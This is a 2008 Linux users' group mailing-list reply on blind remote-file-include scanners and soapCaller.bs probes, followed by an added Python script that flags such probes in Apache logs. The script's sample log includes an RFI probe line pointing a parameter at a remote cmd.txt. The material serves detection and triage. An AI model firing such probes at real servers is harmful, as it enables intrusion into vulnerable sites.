George A. Theall on 4 Nov 2008 18:48:00 -0800



Re: [PLUG] weird process?


On Tue, Nov 04, 2008 at 08:49:36PM -0500, Michael Lazin wrote:

>    I am not familiar with the .bs extension, but without the =http string a
>    GET in the access logs was most likely not a successful hack, even if it
>    is a 200, but I would be curious to see the whole log entry. 

Google turns up a number of hits -- I'll leave it to you to look there
if you're really curious. 

Morfeus, and a newer variant called Szuuper, generally try to exploit a
class of known vulnerabilities (remote file includes), albeit blindly. 
They just run through their list of affected scripts and parameters and
iterate over some directory names.  At various times, I've looked
through log entries from the scanners -- the vulnerabilities they try to
exploit are generally pretty old.  And often in marginal software. 

soapCaller.bs is different, though.  I haven't found a specific
vulnerability involving it.  Nor am I even sure which application(s)
include a file with that name.  There's some speculation it's associated
with Drupal (eg, see <http://stateofsecurity.com/?p=467>), although I've
not come across it there.  Maybe it's a red herring, a way to see if the
server responds to requests for invalid pages with a 200 response code. 
Or maybe there is a vulnerability involving that file. 

The point, though, is not so much to understand what this particular
request is trying to do but to suggest that people keep an open mind
when investigating unusual activity and not dismiss it outright because
they don't consider themselves a particularly appealing target.

George
-- 
theall@tifaware.com
___________________________________________________________________________
Philadelphia Linux Users Group         --        http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug
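As an added example (not code from the original post or from anyone in this thread), the following script triages Apache combined-format access log entries for the three things discussed above: a parameter value that points at a remote URL (the "=http" pattern Michael mentions, which is what a blind remote-file-include probe looks like), a request for soapCaller.bs, and a 200 response for a path the site does not actually serve (George's "red herring" hypothesis, i.e. a server that answers invalid pages with 200). The log lines, the allowlist of real paths and the tag names are all constructed for illustration.

```python
"""Triage Apache combined-log entries for blind remote-file-include probes.

Added example for this thread, not code from the original post.  The log
lines, the set of paths the site really serves and the tag names are
constructed for illustration.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format:
# ip ident user [timestamp] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed allowlist of paths this site actually serves.  In practice
# derive it from the document root or the application's route table.
KNOWN_PATHS = {"/", "/index.php", "/blog/", "/blog/index.php", "/robots.txt"}


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    parts = urlsplit(entry["target"])
    entry["path"] = unquote(parts.path)
    # parse_qsl already percent-decodes names and values.
    entry["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return the list of reasons this entry is interesting (empty if none)."""
    tags = []
    # RFI probe: a parameter value that is itself a remote URL.  Blind
    # scanners fire these at old script/parameter pairs regardless of
    # what the server is actually running.
    for name, value in entry["params"]:
        if value.lower().startswith(("http://", "https://", "ftp://")):
            tags.append(f"rfi-probe:{name}")
    if entry["path"].endswith("soapCaller.bs"):
        tags.append("soapCaller.bs-probe")
    # A 200 for a path the site does not serve suggests the server
    # answers every request with 200, which is exactly what a scanner
    # would be checking for with a request for a nonexistent file.
    if entry["status"] == 200 and entry["path"] not in KNOWN_PATHS:
        tags.append("200-for-unknown-path")
    return tags


def triage(lines):
    """Map each flagged request target to its tags; untagged lines are dropped."""
    hits = {}
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits[entry["target"]] = tags
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Nov/2008:18:10:01 -0500] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Nov/2008:18:10:05 -0500] "GET /modules/soapCaller.bs HTTP/1.1" 404 312 "-" "scanner"',
    '198.51.100.7 - - [04/Nov/2008:18:10:06 -0500] "GET /admin/index.php?page=http://203.0.113.9/cmd.txt?? HTTP/1.1" 200 5123 "-" "scanner"',
    '198.51.100.7 - - [04/Nov/2008:18:10:07 -0500] "GET /blog/index.php?id=42 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [04/Nov/2008:18:10:08 -0500] "GET /soapCaller.bs HTTP/1.1" 200 5123 "-" "scanner"',
]

if __name__ == "__main__":
    for target, tags in triage(SAMPLE_LOG).items():
        print(f"{target}  ->  {', '.join(tags)}")
```

Of the five constructed lines, three are flagged: the two soapCaller.bs requests, and the `page=http://...` request, which is tagged both as an RFI probe and as a 200 for an unknown path. The last tag is the one worth acting on regardless of what soapCaller.bs turns out to be: if your server returns 200 for pages that do not exist, your own logs cannot tell you which probes failed.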